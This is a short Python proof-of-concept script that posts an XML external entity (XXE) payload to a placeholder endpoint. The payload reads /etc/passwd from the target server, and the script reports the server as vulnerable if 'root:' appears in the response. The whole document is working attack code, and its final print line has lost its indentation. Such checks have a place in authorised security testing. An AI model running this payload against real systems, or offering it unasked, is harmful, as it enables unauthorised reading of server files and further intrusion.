import requests
xxe_payload = """<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""
headers = {'Content-Type': 'application/xml'}
r = requests.post('http://target.com/xml-endpoint', data=xxe_payload, headers=headers)
if "root:" in r.text:
print("存在XXE漏洞")